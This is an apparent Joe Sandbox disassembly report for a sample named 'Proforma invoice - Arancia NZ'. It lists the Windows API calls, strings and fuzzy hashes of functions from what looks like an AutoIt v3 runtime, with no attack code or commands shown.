                                                                                                                    • Instruction ID: 43b34374f7004898a1010dece04866767b4aeb9b306bfc96badd74edeef7c732
                                                                                                                    • Opcode Fuzzy Hash: c2520726b30b25d1fac03354630cfe3159d68069255b47ef77f660a8b65f49f7
                                                                                                                    • Instruction Fuzzy Hash: BBE17F71921209EFDB219F64CC88EEE7B79EF09710F108157F915AA290DB709DA4DF60
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 002D49CA
                                                                                                                    • GetDesktopWindow.USER32 ref: 002D49DF
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002D49E6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D4A48
                                                                                                                    • DestroyWindow.USER32(?), ref: 002D4A74
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002D4A9D
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D4ABB
                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002D4AE1
                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 002D4AF6
                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002D4B09
                                                                                                                    • IsWindowVisible.USER32(?), ref: 002D4B29
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002D4B44
                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002D4B58
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002D4B70
                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 002D4B96
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 002D4BB0
                                                                                                                    • CopyRect.USER32(?,?), ref: 002D4BC7
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 002D4C32
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                    • Opcode ID: 169437d293c61637b9639eac92049565e24a5d827386cf138bea263cab1f38b5
                                                                                                                    • Instruction ID: 931c114ef43d5f68b21ecbf5b5706b77e9e5289d050669e2a34897bd4cfc17c8
                                                                                                                    • Opcode Fuzzy Hash: 169437d293c61637b9639eac92049565e24a5d827386cf138bea263cab1f38b5
                                                                                                                    • Instruction Fuzzy Hash: FBB19C70624341AFDB04EF64D948B5ABBE4FF88304F00891EF99A9B2A1D770EC55CB95
                                                                                                                    APIs
                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002B44AC
                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002B44D2
                                                                                                                    • _wcscpy.LIBCMT ref: 002B4500
                                                                                                                    • _wcscmp.LIBCMT ref: 002B450B
                                                                                                                    • _wcscat.LIBCMT ref: 002B4521
                                                                                                                    • _wcsstr.LIBCMT ref: 002B452C
                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002B4548
                                                                                                                    • _wcscat.LIBCMT ref: 002B4591
                                                                                                                    • _wcscat.LIBCMT ref: 002B4598
                                                                                                                    • _wcsncpy.LIBCMT ref: 002B45C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                    • Opcode ID: 1885b275bf57635baffe735baf78fba5d89967a6731c424313a8f846c7735977
                                                                                                                    • Instruction ID: 5775ffc8adef33cc0d7214739a064a384370044d56df71e578a5bff9126e448a
                                                                                                                    • Opcode Fuzzy Hash: 1885b275bf57635baffe735baf78fba5d89967a6731c424313a8f846c7735977
                                                                                                                    • Instruction Fuzzy Hash: 67412A31920205BBDB10FB749C47EFF776CDF45750F044066F909A6183EB319A219BA9
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002528BC
• GetSystemMetrics.USER32(00000007), ref: 002528C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002528EF
• GetSystemMetrics.USER32(00000008), ref: 002528F7
• GetSystemMetrics.USER32(00000004), ref: 0025291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00252939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00252949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0025297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00252990
• GetClientRect.USER32(00000000,000000FF), ref: 002529AE
• GetStockObject.GDI32(00000011), ref: 002529CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 002529D5
  • Part of subcall function 00252344: GetCursorPos.USER32(?), ref: 00252357
  • Part of subcall function 00252344: ScreenToClient.USER32(003157B0,?), ref: 00252374
  • Part of subcall function 00252344: GetAsyncKeyState.USER32(00000001), ref: 00252399
  • Part of subcall function 00252344: GetAsyncKeyState.USER32(00000002), ref: 002523A7
• SetTimer.USER32(00000000,00000000,00000028,00251256), ref: 002529FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 002AA47A
• __swprintf.LIBCMT ref: 002AA51B
• _wcscmp.LIBCMT ref: 002AA52E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002AA583
• _wcscmp.LIBCMT ref: 002AA5BF
• GetClassNameW.USER32(?,?,00000400), ref: 002AA5F6
• GetDlgCtrlID.USER32(?), ref: 002AA648
• GetWindowRect.USER32(?,?), ref: 002AA67E
• GetParent.USER32(?), ref: 002AA69C
• ScreenToClient.USER32(00000000), ref: 002AA6A3
• GetClassNameW.USER32(?,?,00000100), ref: 002AA71D
• _wcscmp.LIBCMT ref: 002AA731
• GetWindowTextW.USER32(?,?,00000400), ref: 002AA757
• _wcscmp.LIBCMT ref: 002AA76B
  • Part of subcall function 0027362C: _iswctype.LIBCMT ref: 00273634
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 002AAF18
• _wcscmp.LIBCMT ref: 002AAF29
• GetWindowTextW.USER32(00000001,?,00000400), ref: 002AAF51
• CharUpperBuffW.USER32(?,00000000), ref: 002AAF6E
• _wcscmp.LIBCMT ref: 002AAF8C
• _wcsstr.LIBCMT ref: 002AAF9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 002AAFD5
• _wcscmp.LIBCMT ref: 002AAFE5
• GetWindowTextW.USER32(00000002,?,00000400), ref: 002AB00C
• GetClassNameW.USER32(00000018,?,00000400), ref: 002AB055
• _wcscmp.LIBCMT ref: 002AB065
• GetClassNameW.USER32(00000010,?,00000400), ref: 002AB08D
• GetWindowRect.USER32(00000004,?), ref: 002AB0F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
APIs
  • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
• DragQueryPoint.SHELL32(?,?), ref: 002DC627
  • Part of subcall function 002DAB37: ClientToScreen.USER32(?,?), ref: 002DAB60
  • Part of subcall function 002DAB37: GetWindowRect.USER32(?,?), ref: 002DABD6
  • Part of subcall function 002DAB37: PtInRect.USER32(?,?,002DC014), ref: 002DABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 002DC690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002DC69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002DC6BE
• _wcscat.LIBCMT ref: 002DC6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 002DC705
• SendMessageW.USER32(?,000000B0,?,?), ref: 002DC71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 002DC735
• SendMessageW.USER32(?,000000B1,?,?), ref: 002DC757
• DragFinish.SHELL32(?), ref: 002DC75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002DC851
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb1
• API String ID: 169749273-3371520547
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 002C5013
• LoadCursorW.USER32(00000000,00007F00), ref: 002C501E
• LoadCursorW.USER32(00000000,00007F03), ref: 002C5029
• LoadCursorW.USER32(00000000,00007F8B), ref: 002C5034
• LoadCursorW.USER32(00000000,00007F01), ref: 002C503F
• LoadCursorW.USER32(00000000,00007F81), ref: 002C504A
• LoadCursorW.USER32(00000000,00007F88), ref: 002C5055
• LoadCursorW.USER32(00000000,00007F80), ref: 002C5060
• LoadCursorW.USER32(00000000,00007F86), ref: 002C506B
• LoadCursorW.USER32(00000000,00007F83), ref: 002C5076
• LoadCursorW.USER32(00000000,00007F85), ref: 002C5081
• LoadCursorW.USER32(00000000,00007F82), ref: 002C508C
• LoadCursorW.USER32(00000000,00007F84), ref: 002C5097
• LoadCursorW.USER32(00000000,00007F04), ref: 002C50A2
• LoadCursorW.USER32(00000000,00007F02), ref: 002C50AD
• LoadCursorW.USER32(00000000,00007F89), ref: 002C50B8
• GetCursorInfo.USER32(?), ref: 002C50C8
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002DA259
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 002DA2D3
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002DA34D
                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002DA36F
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA382
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 002DA3A4
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00250000,00000000), ref: 002DA3DB
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA3F4
                                                                                                                    • GetDesktopWindow.USER32 ref: 002DA40D
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002DA414
                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002DA42C
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002DA444
                                                                                                                      • Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002D4424
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D446F
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002DB8B4
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002D91C2), ref: 002DB910
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002DB949
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002DB98C
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002DB9C3
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 002DB9CF
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002DB9DF
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,002D91C2), ref: 002DB9EE
                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002DBA0B
                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002DBA17
                                                                                                                      • Part of subcall function 00272EFD: __wcsicmp_l.LIBCMT ref: 00272F86
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002BA3CB
                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 002BA418
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA460
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA497
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA4C5
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0028E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 002AF8DF
                                                                                                                    • LoadStringW.USER32(00000000,?,0028E029,00000001), ref: 002AF8E8
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0028E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 002AF90A
                                                                                                                    • LoadStringW.USER32(00000000,?,0028E029,00000001), ref: 002AF90D
                                                                                                                    • __swprintf.LIBCMT ref: 002AF95D
                                                                                                                    • __swprintf.LIBCMT ref: 002AF96E
                                                                                                                    • _wprintf.LIBCMT ref: 002AFA17
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002AFA2E
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002D9207,?,?), ref: 002DBA56
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA6D
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA78
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA85
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002DBA8E
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA9D
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002DBAA6
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBAAD
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBABE
                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,002E2CAC,?), ref: 002DBAD7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 002DBAE7
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 002DBB0B
                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002DBB36
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002DBB5E
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002DBB74
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 7c5778aeb20d87902e08c08bfddcdd9e17e53128b66026370969da0f463d920f
                                                                                                                    • Instruction ID: 52ae5256623716267d17d4403594a7664119e420874298fba9b6545dfeb6e663
                                                                                                                    • Opcode Fuzzy Hash: 7c5778aeb20d87902e08c08bfddcdd9e17e53128b66026370969da0f463d920f
                                                                                                                    • Instruction Fuzzy Hash: 32416A75A01205EFCB119F65ED8CEAA7BB8FF89711F11806AF90AD7260D7709E01CB60
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 002BDA10
                                                                                                                    • _wcscat.LIBCMT ref: 002BDA28
                                                                                                                    • _wcscat.LIBCMT ref: 002BDA3A
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002BDA4F
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BDA63
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002BDA7B
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 002BDA95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BDAA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                    • Opcode ID: 1079e4f17675573dcf2f41d34c76bedc23fe94c44d61902d63e76eac0f531140
                                                                                                                    • Instruction ID: 0ea81ae4062b4a1f473f579de04ccc1cecaa2d3df710c9aa37f4fb5ba3753965
                                                                                                                    • Opcode Fuzzy Hash: 1079e4f17675573dcf2f41d34c76bedc23fe94c44d61902d63e76eac0f531140
                                                                                                                    • Instruction Fuzzy Hash: 6481B2725246419FCB24EF64C844AEAB7E4AF89390F18882EF889C7251E730ED55CB52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002DC1FC
                                                                                                                    • GetFocus.USER32 ref: 002DC20C
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 002DC217
                                                                                                                    • _memset.LIBCMT ref: 002DC342
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002DC36D
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 002DC38D
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 002DC3A0
                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002DC3D4
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002DC41C
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002DC454
                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002DC489
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                    • Opcode ID: 094ca9139b5883986425072bc4b3c63cc1d5f73bee08c64c3834e27ad2e7113b
                                                                                                                    • Instruction ID: 43b31efb021860eb688b67ac1cf1362ec401e549a6ceddcc0b02d0a036fb236c
                                                                                                                    • Opcode Fuzzy Hash: 094ca9139b5883986425072bc4b3c63cc1d5f73bee08c64c3834e27ad2e7113b
                                                                                                                    • Instruction Fuzzy Hash: 4E819C706283429FD715DF14D894AAABBE8EF88314F20492EF99597391C770DD14CB92
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 002C738F
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002C739B
                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 002C73A7
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 002C73B4
